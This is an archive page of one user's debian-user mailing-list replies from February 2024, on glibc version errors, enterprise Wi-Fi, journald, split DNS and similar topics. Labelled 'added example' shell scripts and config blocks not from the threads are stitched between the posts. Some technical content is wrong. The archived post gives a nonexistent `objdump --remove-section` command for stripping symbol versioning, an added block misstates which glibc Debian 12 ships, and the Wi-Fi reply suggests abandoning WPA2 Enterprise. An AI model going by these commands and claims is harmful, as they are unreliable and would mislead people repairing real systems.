Re: debian-devel wishlist "bugs"

2024-02-29 Thread Jeffrey Walton
On Fri, Mar 1, 2024 at 12:22 AM Gareth Evans  wrote:
>
> I'm subscribed to debian-devel for entertainment purposes and see regular 
> wishlist "bug" reports, eg.
>
> https://lists.debian.org/debian-devel/2024/02/msg00321.html
>
> Can anyone advise of the appropriate way for non-developers to 
> request/suggest inclusion of packages?

Open a bug report against the wnpp package. See
 and .

> Freenginx doesn't seem to be in testing but might be a worthwhile addition.



Jeff



Re: where are the crontab files in Trixie?

2024-02-27 Thread Jeffrey Walton
On Tue, Feb 27, 2024 at 2:12 PM Gary Dale  wrote:
>
> On 2024-02-27 10:25, Kushal Kumaran wrote:
> > On Tue, Feb 27 2024 at 10:15:59 AM, Gary Dale  
> > wrote:
> >> [...]
> >> Can anyone explain how Trixie is handling crontabs now?
> > This behavior has existed forever.  I'm on bookworm, though, so no idea
> > if anything is changing in trixie.
> The debian wiki suggests that the handling of cron/anacron is evolving.

That sounds like a euphemism for "being killed off" by Systemd and its timers.

Jeff



Re: How to upgrade the GLIBCXX and GLIBC to the specific version

2024-02-27 Thread Jeffrey Walton
On Tue, Feb 27, 2024 at 9:28 AM Gremlin  wrote:
>
> On 2/27/24 09:23, Jeffrey Walton wrote:
> > On Tue, Feb 27, 2024 at 8:34 AM Gremlin  
> > wrote:
> >> [...]
> >>> Another option is to rebuild blueriver_bitmap_streamer. Before the
> >>> build, rip out that useless symbol versioning. All that symbol
> >>> versioning does is to cause a DoS and frustrate users.
> >>>
> >>> You can find the ASM directives to rip out the versioning by grepping
> >>> for '.symver'. It will be in an ASM block.
> >>
> >> https://info.semtech.com/blueriver-av-manager
> >>
> >> The source:
> >>
> >> https://semtech.my.salesforce.com/sfc/p/#E000JelG/a/RQ01m7Hx/ptDTNUqlZvD_8F_SbhjtoHaX9jOZ_fKxuauW0cZp5ag?utm_referrer=https%3A%2F%2Finfo.semtech.com%2F
> >>
> >> Unable to Process Request
> >> We couldn't access the content delivery.
> >>
> >> This content has been deleted, doesn't exist, or can't be previewed.
> >>
> >> Gonna be hard to do that
> >
> > OP might then take a look at editing the elf file directly. `objdump
> > --remove-section .symver blueriver_bitmap_streamer` should do the
> > trick.
>
> Why?

The OP wants to run his software.

Surely you have a better question than "Why," but I don't know what it is.

Jeff



Re: How to upgrade the GLIBCXX and GLIBC to the specific version

2024-02-27 Thread Jeffrey Walton
On Tue, Feb 27, 2024 at 8:34 AM Gremlin  wrote:
>
> On 2/27/24 08:27, Jeffrey Walton wrote:
> > On Tue, Feb 27, 2024 at 5:52 AM Diego Luo (罗国雄)  wrote:
> >>
> >> Would you pls help give tips about how to upgrade the GLIBCXX and GLIBC to 
> >> the specific version (GLIBCXX_3.4.29, GLIBC_2.34) on Debian?
> >>
> >> I am using the Raspberry Pi 4B with the Raspbian OS “Linux raspberrypi 
> >> 5.15.61-v8+ #1579 SMP PREEMPT Fri Aug 26 11:16:44 BST 2022 aarch64 
> >> GNU/Linux”, which is Debian based OS.
> >>
> >> When running a SW I met the problem missing the required versions of 
> >> GLIBCXX and GLIBC, with the details below.
> >>
> >> root@raspberrypi:/home/bitmap_overlap/linux-aarch64# 
> >> ./blueriver_bitmap_streamer
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libstdc++.so.6: 
> >> version `GLIBCXX_3.4.29' not found (required by 
> >> ./blueriver_bitmap_streamer)
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> >> `GLIBC_2.32' not found (required by ./blueriver_bitmap_streamer)
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> >> `GLIBC_2.33' not found (required by ./blueriver_bitmap_streamer)
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> >> `GLIBC_2.34' not found (required by ./blueriver_bitmap_streamer)
> >>
> >> root@raspberrypi:/home/bitmap_overlap/linux-aarch64#
> >
> > Another option is to rebuild blueriver_bitmap_streamer. Before the
> > build, rip out that useless symbol versioning. All that symbol
> > versioning does is to cause a DoS and frustrate users.
> >
> > You can find the ASM directives to rip out the versioning by grepping
> > for '.symver'. It will be in an ASM block.
>
> https://info.semtech.com/blueriver-av-manager
>
> The source:
>
> https://semtech.my.salesforce.com/sfc/p/#E000JelG/a/RQ01m7Hx/ptDTNUqlZvD_8F_SbhjtoHaX9jOZ_fKxuauW0cZp5ag?utm_referrer=https%3A%2F%2Finfo.semtech.com%2F
>
> Unable to Process Request
> We couldn't access the content delivery.
>
> This content has been deleted, doesn't exist, or can't be previewed.
>
> Gonna be hard to do that

OP might then take a look at editing the elf file directly. `objdump
--remove-section .symver blueriver_bitmap_streamer` should do the
trick.

Jeff



Re: How to upgrade the GLIBCXX and GLIBC to the specific version

2024-02-27 Thread Jeffrey Walton
On Tue, Feb 27, 2024 at 5:52 AM Diego Luo (罗国雄)  wrote:
>
> Would you pls help give tips about how to upgrade the GLIBCXX and GLIBC to 
> the specific version (GLIBCXX_3.4.29, GLIBC_2.34) on Debian?
>
> I am using the Raspberry Pi 4B with the Raspbian OS “Linux raspberrypi 
> 5.15.61-v8+ #1579 SMP PREEMPT Fri Aug 26 11:16:44 BST 2022 aarch64 
> GNU/Linux”, which is Debian based OS.
>
> When running a SW I met the problem missing the required versions of GLIBCXX 
> and GLIBC, with the details below.
>
> root@raspberrypi:/home/bitmap_overlap/linux-aarch64# 
> ./blueriver_bitmap_streamer
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libstdc++.so.6: version 
> `GLIBCXX_3.4.29' not found (required by ./blueriver_bitmap_streamer)
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> `GLIBC_2.32' not found (required by ./blueriver_bitmap_streamer)
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> `GLIBC_2.33' not found (required by ./blueriver_bitmap_streamer)
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> `GLIBC_2.34' not found (required by ./blueriver_bitmap_streamer)
>
> root@raspberrypi:/home/bitmap_overlap/linux-aarch64#

Another option is to rebuild blueriver_bitmap_streamer. Before the
build, rip out that useless symbol versioning. All that symbol
versioning does is to cause a DoS and frustrate users.

You can find the ASM directives to rip out the versioning by grepping
for '.symver'. It will be in an ASM block.

Jeff
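
Before touching the binary or the system libraries, the check a practitioner wants is an exact list of which symbol versions the program requires and which the installed libc provides; this is an added example, not from the thread. The functions parse `objdump -T` style output, so the logic can be exercised on constructed samples below (modelled on the OP's error messages) without the vendor binary; on the Pi, feed them `objdump -T ./blueriver_bitmap_streamer` and `objdump -T /lib/aarch64-linux-gnu/libc.so.6`. GLIBCXX versions come from libstdc++.so.6, so pass that library when checking the GLIBCXX prefix. `sort -V` is the GNU version sort.

```shell
#!/bin/sh
# Added example (not from the thread): list the GLIBC/GLIBCXX symbol versions
# a binary needs, the highest of each, and which ones a given library lacks.

# stdin: objdump -T output of the program; prints the versions it imports, sorted
required_versions() {
    grep -E '\*UND\*' \
      | grep -Eo '\(?(GLIBC|GLIBCXX|CXXABI)_[0-9.]+\)?' \
      | tr -d '()' | sort -u -V
}

# stdin: objdump -T output of a shared library; prints the versions it defines
provided_versions() {
    grep -Ev '\*UND\*' \
      | grep -Eo '\(?(GLIBC|GLIBCXX|CXXABI)_[0-9.]+\)?' \
      | tr -d '()' | sort -u -V
}

# usage: highest_required PREFIX   (PREFIX is GLIBC or GLIBCXX); stdin as above
highest_required() {
    required_versions | grep "^$1_" | tail -n1
}

# usage: missing_versions PREFIX PROG_DUMP_FILE LIB_DUMP_FILE
# prints the PREFIX_ versions the program needs that the library does not define
missing_versions() {
    req=$(mktemp); prov=$(mktemp)
    required_versions < "$2" | grep "^$1_" | LC_ALL=C sort > "$req"
    provided_versions < "$3" | grep "^$1_" | LC_ALL=C sort > "$prov"
    LC_ALL=C comm -23 "$req" "$prov"
    rm -f "$req" "$prov"
}

# Constructed samples in objdump -T format (parenthesised = hidden version).
PROG_DUMP='DYNAMIC SYMBOL TABLE:
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.34) __libc_start_main
0000000000000000      DF *UND*  0000000000000000  GLIBC_2.17  puts
0000000000000000      DF *UND*  0000000000000000  GLIBC_2.33  stat
0000000000000000      DF *UND*  0000000000000000  GLIBCXX_3.4.29 _ZSt28__throw_bad_array_new_lengthv
0000000000000000      DF *UND*  0000000000000000  GLIBCXX_3.4   _ZNSt8ios_base4InitC1Ev'
LIBC_DUMP='DYNAMIC SYMBOL TABLE:
0000000000020000 g    DF .text  0000000000000030  GLIBC_2.17  puts
0000000000021000 g    DF .text  0000000000000080  GLIBC_2.28  fcntl64
0000000000022000 g    DF .text  0000000000000010  GLIBC_2.17  __libc_start_main
0000000000000000 g    DO *ABS*  0000000000000000  GLIBC_2.31  GLIBC_2.31'
```

The missing list tells you which glibc the vendor built against (GLIBC_2.34 first appeared in glibc 2.34, the version shipped in Debian 12), which is the number to quote when choosing between a newer Debian release, running the program inside a bookworm container or chroot, or asking the vendor for a build against the Raspbian release you have.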



Re: medically smart watches

2024-02-26 Thread Jeffrey Walton
On Mon, Feb 26, 2024 at 2:47 PM hw  wrote:
>
> Well, I was merely hoping that someone might finally have come up with
> a working solution ...

Stop smoking, lose weight, have a healthy diet and exercise.

Jeff

> On Mon, 2024-02-26 at 13:07 +, Andy Smith wrote:
> > Hi,
> >
> > On Mon, Feb 26, 2024 at 12:24:34PM +0100, hw wrote:
> > > How does the watch you got measure blood sugar?  Doesn't that require
> > > a blood sample?
> >
> > Some of them claim to extrapolate it from sweat, others claim to be
> > able to estimate it from shining near-infrared at the blood vessels
> > that are near the surface. Neither method has yet proven to be
> > accurate, which is why they aren't certified as a medical device in
> > UK.
> >
> > You can learn all about it by searching "non-invasive blood glucose
> > monitoring"



Re: Wifi - unable to connect.

2024-02-26 Thread Jeffrey Walton
On Mon, Feb 26, 2024 at 12:03 PM Grzesiek Sójka  wrote:
>
> Hi there,
>
> I'm trying to connect to wifi at work, unfortunately I get the following:
>
> wlan0: SME: Trying to authenticate with 24:81:3b:2a:0f:e1 (SSID='ssid'
> freq=2412 MHz)
> wlan0: Trying to associate with 24:81:3b:2a:0f:e1 (SSID='ssid' freq=2412
> MHz)
> wlan0: Associated with 24:81:3b:2a:0f:e1
> wlan0: CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
> wlan0: CTRL-EVENT-REGDOM-CHANGE init=COUNTRY_IE type=COUNTRY alpha2=PL
> wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
> wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=26
> wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 26 (MSCHAPV2) selected
> EAP-MSCHAPV2: Authentication succeeded
> wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
> wlan0: PMKSA-CACHE-ADDED 24:81:3b:2a:0f:e1 1
> wlan0: RSN: PMKID mismatch - authentication server may have derived
> different MSK?!
> wlan0: CTRL-EVENT-DISCONNECTED bssid=24:81:3b:2a:0f:e1 reason=1
> locally_generated=1
> BSSID 24:81:3b:2a:0f:e1 ignore list count incremented to 2, ignoring for
> 10 seconds
> wlan0: CTRL-EVENT-DSCP-POLICY clear_all
>
> According to the instruction the settings should be:
> WPA2 Enterprise,
> PEAP,
> MSCHAPv2,
> no certificate.
>
> And my wpa config is:
> network={
>  ssid="ssid"
>  proto=RSN
>  key_mgmt=WPA-EAP
>  pairwise=CCMP
>  auth_alg=OPEN
>  eap=MSCHAPV2
>  identity="uid"
>  password="pas"
>  mesh_fwding=1
> }
>
> Any suggestions?

Not my area of expertise, but...

EAP success tells me you are authenticated using the shared secret or password.

WPA2 Enterprise and MSCHAPv2 look suspicious. I would use WPA2
Personal without MSCHAP and see if it produces a better result.

Jeff
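
An added example, not from this thread or the later "[solved]" one: audit a wpa_supplicant network block before using it on a WPA-EAP network. The "EAP-MSCHAPV2: Authentication succeeded" line above shows the password was accepted, but a PEAP/MSCHAPv2 block with no `ca_cert=` and no `domain_match=` will run the same MSCHAPv2 exchange with any access point that announces the SSID, so the check flags blocks that lack server validation, an outer method (the posted block uses `eap=MSCHAPV2` directly; the later thread's `eap=PEAP` with `phase2="auth=MSCHAPV2"` is the usual shape), or carry the mesh-only `mesh_fwding=` option. BAD is the posted block; GOOD is a hardened version whose CA path and RADIUS server name are placeholders to be replaced with what the site's IT provides.

```shell
#!/bin/sh
# Added example (not from the thread): flag weak settings in a wpa_supplicant
# WPA-EAP network block read from stdin. Prints one finding per line; exit 1 if any.
audit_eap_block() {
    conf=$(cat)
    # get KEY -> value of KEY= in the block, quotes stripped, first occurrence
    get() { printf '%s\n' "$conf" | sed -n "s/^[[:space:]]*$1=[\"']\{0,1\}\([^\"']*\).*/\1/p" | head -n1; }
    rc=0
    case "$(get key_mgmt)" in *WPA-EAP*) ;; *) return 0 ;; esac   # only enterprise blocks
    eap=$(get eap); phase2=$(get phase2)
    case "$eap" in
        MSCHAPV2) echo "eap=MSCHAPV2 is an inner method; use eap=PEAP with phase2=\"auth=MSCHAPV2\""; rc=1 ;;
        PEAP|TTLS) [ -n "$phase2" ] || { echo "no phase2= inner method given"; rc=1; } ;;
        TLS) ;;
        *) echo "unexpected eap=$eap"; rc=1 ;;
    esac
    if [ "$eap" != TLS ]; then
        # Password-based methods are only as safe as the tunnel they run in:
        # the client must verify which server terminates it.
        [ -n "$(get ca_cert)" ] \
            || { echo "no ca_cert=; the server certificate is not validated"; rc=1; }
        [ -n "$(get domain_match)$(get domain_suffix_match)$(get altsubject_match)" ] \
            || { echo "no domain_match=/domain_suffix_match=; any certificate from the CA is accepted"; rc=1; }
    fi
    if [ "$eap" = PEAP ] || [ "$eap" = TTLS ]; then
        [ -n "$(get anonymous_identity)" ] \
            || echo "no anonymous_identity=; the real identity is sent in the clear in the outer exchange"
    fi
    if [ -n "$(get mesh_fwding)" ]; then
        echo "mesh_fwding= only applies to mesh (IBSS/MESH) networks; drop it"
    fi
    return $rc
}

# The block as posted (constructed copy).
BAD='network={
  ssid="ssid"
  proto=RSN
  key_mgmt=WPA-EAP
  pairwise=CCMP
  auth_alg=OPEN
  eap=MSCHAPV2
  identity="uid"
  password="pas"
  mesh_fwding=1
}'

# Hardened version; CA bundle path and RADIUS server name are placeholders.
GOOD='network={
  ssid="ssid"
  key_mgmt=WPA-EAP
  eap=PEAP
  phase2="auth=MSCHAPV2"
  anonymous_identity="anonymous"
  identity="uid"
  password="pas"
  ca_cert="/etc/ssl/certs/ca-certificates.crt"
  domain_match="radius.example.org"
}'
```

Run it as `audit_eap_block < wpa_supplicant.conf` on a file containing a single network block. The value for `domain_match=` is the subject name of the RADIUS server's certificate; if the site cannot tell you that and which CA issued it, the "no certificate" instruction is asking you to accept whatever the air gives you.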



Re: Journald's qualities

2024-02-26 Thread Jeffrey Walton
On Mon, Feb 26, 2024 at 10:42 AM Mariusz Gronczewski  wrote:
>
> Dnia 2024-02-26, o godz. 13:10:43
> Anssi Saari  napisał(a):
>
> > Mariusz Gronczewski  writes:
> >
> > > Offtopic but since Debian switched to systemd for DNS management on
> > > VPNs and suc I need to restart it sometimes multiple times to just
> > > get "right" DNS servers, because there appears to be no notion of
> > > priority:
> > >
> > > https://github.com/systemd/systemd/issues/27543
> > >
> > > so now any time I connect to work (just openvpn tunnel, nothing
> > > fancy) I need to spam
> > >
> > > systemclt restart systemd-resolved ; sleep 1 ; cat /etc/resolv.conf
> > >
> > > few times till the dice rolls the right order of DNS servers...
> >
> > Interesting. I leaped on systemd-networkd and -resolved when I read
> > years ago it added interface specific DNS support. So now my local DNS
> > (dnsmasq in the router) handles my home network and what goes out via
> > the VPN (i.e. tun0 or wg0 these days) uses the VPN's DNS.
>
> ... in what way? You need to resolve DNS first before you know which
> interface the traffic is going out of.

I _think_ that depends on the configuration. You can use local DNS for
name resolution, or remote (VPN) DNS for name resolution.

Sometimes both are used at the same time. I think that's called "split
DNS" or "split brain DNS."

> > Or if the
> > VPN is off, the local DNS forwards queries to DHCP assigned DNS. I
> > see no issues although I don't have the kind of VPN where some
> > external traffic goes through it only but might work for that too.
> > For me the default was that systemd-resolved dutifully spammed all
> > DNS queries to all DNS servers through all interfaces.
> >
> > This interface specific DNS was a little hard to setup as I
> > recall. Easier with WG than OpenVPN.
> >
>
> Our case is basically that:
>
> * some of the records exist only on VPN DNS server (private domains
>   pointing to private IPs)
> * some of the records exist on outside but the VPN DNS returns private
>   range IP addresses for it (so-called split-horizon DNS).
>
> So the only right way is to ask the first server on the list. That
> worked before systemd-resolved came as Debian scripts just put the
> VPN's DNS servers in the front. Now it is throw of the dice any time
> the daemon is restarted.
>
> The proper way would be either to:
>
> * ask in order, with components registering the DNS server specifying
>   that priority so the daemon can result the sorted list
> * have a way to do per-domain exception and do "if domain is
>   *.internal.example.com, ask VPN server's DNS"
>
> The second is possible in dnsmasq but not (AFAIK) in systemd. And
> currently neither "make systemd a DNS resolver" nor "use
> systemd-resolved provided DNS config" work reliably.

Jeff
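
What the split-DNS setup described above looks like in systemd-resolved's own terms, as an added example (not from either poster): resolved does per-link routing domains, and a domain prefixed with `~` routes only queries under it to that link's servers, which is the "if domain is *.internal.example.com, ask the VPN's DNS" rule from the quoted message. The interface name and server address are assumptions; this fragment is a systemd-networkd `.network` file and only applies if networkd manages the tunnel interface.

```ini
# /etc/systemd/network/50-vpn.network (example; tun0 and 10.8.0.1 are placeholders)
[Match]
Name=tun0

[Network]
DNS=10.8.0.1
# "~" makes this a routing domain: only names under it go to 10.8.0.1.
Domains=~internal.example.com
# Keep other queries off the VPN resolver (they stay with the LAN's dnsmasq).
DNSDefaultRoute=no
```

For an OpenVPN tunnel that networkd does not manage, the same three settings can be applied from the tunnel's up script with `resolvectl dns tun0 10.8.0.1`, `resolvectl domain tun0 '~internal.example.com'` and `resolvectl default-route tun0 no`; to send every query through the VPN instead, use the catch-all routing domain `~.`. `resolvectl status tun0` shows what was actually applied.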



Re: Postel's Law (Was Re: Inclusive terminology (instead of master/slave) for network bonding/LACP)

2024-02-24 Thread Jeffrey Walton
On Sat, Feb 24, 2024 at 7:37 PM Andy Smith  wrote:
>
> [...]
> Turning back more to protocol design, we have spent decades walking
> back Postel's Law as we find more and more ways that being liberal
> in what our software accepts is untenable in the face of a hostile
> Internet.

++. Postel's Law is a disaster nowadays. It was fine back in the
1980's, but it is dangerous in the toxic environments of today.

Here's what we teach our developers: Look for any reason you can to
reject the data. If you can't find a reason, then begrudgingly perform
the processing or transformation.

Jeff
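
The "look for a reason to reject" rule applied to one input, as an added example (not from the thread): a hostname argument is accepted only if it is non-empty, within the RFC 1123 length limits, and made of dotted labels of letters, digits and interior hyphens. Everything else, including a leading dash that a later command would read as an option, empty labels, or any shell metacharacter or newline, is rejected before the value reaches a command.

```shell
#!/bin/sh
# Added example (not from the thread): allowlist validation of a hostname,
# rejecting anything that is not positively known to be acceptable.

# usage: valid_hostname NAME  -> exit 0 only for an acceptable name
valid_hostname() {
    name=$1
    [ -n "$name" ] || return 1
    [ ${#name} -le 253 ] || return 1
    case "$name" in
        -*|*-) return 1 ;;                   # option-like start or dangling hyphen
        *[!A-Za-z0-9.-]*) return 1 ;;         # anything outside the allowlist: space ; $ / newline ...
        .*|*.|*..*) return 1 ;;               # empty labels
    esac
    old_ifs=$IFS; IFS=.
    for label in $name; do
        IFS=$old_ifs
        [ ${#label} -le 63 ] || return 1
        case "$label" in -*|*-) return 1 ;; esac   # hyphen at a label edge
    done
    IFS=$old_ifs
    return 0
}

# usage: resolve_or_reject NAME -> only validated names reach getent
resolve_or_reject() {
    valid_hostname "$1" || { echo "rejected: $1" >&2; return 1; }
    getent hosts "$1"
}
```

The point is the shape, not the particular rules: the function has no branch that tries to repair or reinterpret a bad value, and the command at the end runs only on the subset the validator positively admitted.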



Re: Journald's qualities

2024-02-23 Thread Jeffrey Walton
On Fri, Feb 23, 2024 at 10:17 PM The Wanderer  wrote:
>
> On 2024-02-23 at 15:35, Stefan Monnier wrote:
>
> >>> but what are the advantages of journald's representation compared
> >>> to a naive one?
> >>
> >> in short: querability without text parsing. That's about it.
> >
> > They have to parse the binary format, so that's not in and of itself
> > an upside compared to parsing CSV.
> >
> > I've made my share of bad design decisions that don't pan out. But
> > there's always an upside to my decision (even when it turns out it
> > speeds up only those cases which can never occur, because of some
> > other aspect of the system).
> >
> > AFAICT the format is *not* just a plain sequence of log entries, so
> > there's some additional structure which is intended to speed up some
> > operations.
> >
> > IOW, even if contrived, there should be *some* use case where it
> > does better than CSV, no?
>
> I can think of two possibilities, just offhand, in no particular order:
>
> * No need to parse the timestamps, et cetera, and take the risk that
> someone put in one that's in a format you don't expect; the times are
> stored internally in a consistent guaranteed format, so you can just use
> internal reader functions (paired with, and updated alongside, the
> internal writer functions) and be done with it.
>
> * No need to worry about handling log entries that *contain* commas, or
> whatever other element was chosen as the separator.

Systemd also provides tamper-resistant logs. The property is often
desirable in the enterprise. See Forward Secure Sealing,
.

Jeff



Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

2024-02-23 Thread Jeffrey Walton
On Fri, Feb 23, 2024 at 1:13 PM Gremlin  wrote:
>
> On 2/23/24 12:51, Dan Ritter wrote:
> > Jeffrey Walton wrote:
>
> [ >/dev/null ]
>
> >
> > Let's bring it back around to actual action.
> >
> > The possible positions:
> >
> > 1. The terminology is bad, and I'm willing to work on fixing it.
> >
> > 2. The terminology is bad, but I can't work on it myself.
> >
> > 3. The terminology does not bother me, but I don't care if someone else 
> > wants to fix it.
> >
> > 4. The terminology is good and we should not fix it.
> >
> > People taking positions one through three are people that I can
> > work with.
>
> 5. The terminology is good and we should fix it.

If you wish to see how this is going to play out, then visit
<https://github.com/joyent/libuv/pull/1015>. That's the Ben Noordhuis
and Node.js pronoun scandal from 2014.

Jeff



Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

2024-02-23 Thread Jeffrey Walton
On Thu, Feb 22, 2024 at 5:36 AM Ralph Aichinger  wrote:
>
> I know this is a loaded topic. I really don't want to discuss the
> political aspects of the "why", but just want to know the facts, i.e.
> how far this has been progressed in Debian.
>
> Is there anything planned to get "master/slave" terminology out of
> network bonding/LACP in Debian (or Linux kernel or whoever decides
> this terminology)? I know these things are slow to change, just
> wondering.
>
> https://wiki.debian.org/Bonding

This might be a question that is more appropriate for Debian's
Technical Committee, .

Jeff



Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

2024-02-23 Thread Jeffrey Walton
On Fri, Feb 23, 2024 at 5:08 AM Marco Moock  wrote:
> Am 22.02.2024 schrieb Ralph Aichinger :
> [...]
> > Is there anything planned to get "master/slave" terminology out of
> > network bonding/LACP in Debian (or Linux kernel or whoever decides
> > this terminology)? I know these things are slow to change, just
> > wondering.
> >
> > https://wiki.debian.org/Bonding
>
> I don't know why somebody should waste time for changing terms there.
> There is almost no technical benefit and the amount of people who
> operate Ethernet bonds is small, so the probability that somebody feels
> disturbed by those terms here is also small.
> [...]
> I don't think that spending time on that is a valuable thing, there are
> more important tasks like testing or adding functionality.

I align with most of this position. An engineer's time is better spent
on technical problems, not political ones. There is no technical
benefit, so don't spend time on it. And there are other venues for
political discourse.

> If you like to change that, feel free to create a fork of the upstream
> projects and use the terms you prefer.

I hope no one would object if OP created a politically correct
ifenslave-pc package.

I don't want to bikeshed, though. Slavery ended in the US about 150
years ago. I don't know any slaves, and I don't own any slaves, so I
don't really have a dog in the fight.

Jeff



Re: Thank you Debian

2024-02-21 Thread Jeffrey Walton
On Wed, Feb 21, 2024 at 5:47 PM Andre Rodier  wrote:
> [...]
>
> A few years ago, I created a set of Ansible scripts to code what I was
> already doing manually, so I could rebuild my server from scratch.
>
> The solution is on GitHub, and while there was already a plethora of
> existing solutions, none of them implemented everything I wanted and
> needed. It was apparently challenging:
>
> 1. A DNS server included, with DNSSEC implemented, and SSHFP.
> 2. Everything from Debian packages, so upgrade can be automatic.
> 3. No git clone and no zip download for any service.
> 4. The usual LetsEncrypt, but also the extra like CAA, DANE, etc...
> 5. All services should be running under AppArmor.
> 6. No PHP, no RoundCube, NextCloud, OwnCloud, etc please.
> 7. Jabber server, with c2s and s2s.
> 8. CardDAV and CalDAV server.
> 9. WebDAV server.
> 10. LDAP for authentication, not a MySQL database.
> 11. IPv6 support
>
> The points #2 and #3 are particularly interesting. I seriously cannot
> understand why or how people could trust a server exposed on internet,
> without automatic updates from a serious community like Debian. Are they
> suppose to receive alerts from GitHub releases to manually download them
> as they happen ? How can this be done while they are on vacation ?
> Excuse my naive question, if it is, please.
>
> To be precise, I am using unattended upgrades, and automatic reboot, and
> never had any issue, thanks to Debian packages quality. I just sometimes
> receive a nice email saying the server rebooted.
>
> This wouldn't have been possible without the Debian community, so, again,
> thank you for that.
>
> We have been happy with this solution, for myself, and a few friends and
> family members, but I would like the opinion from the security experts
> on this list.
>
> - What is the best approach to check if there is any vulnerability in
> the packages configuration ?
> - Is there any service that could audit the deployment code or the
> configuration files ?

You will probably need to stitch together several different solutions,
based on the context. For example, use an Ansible Linter for your
Ansible scripts, .

Jeff


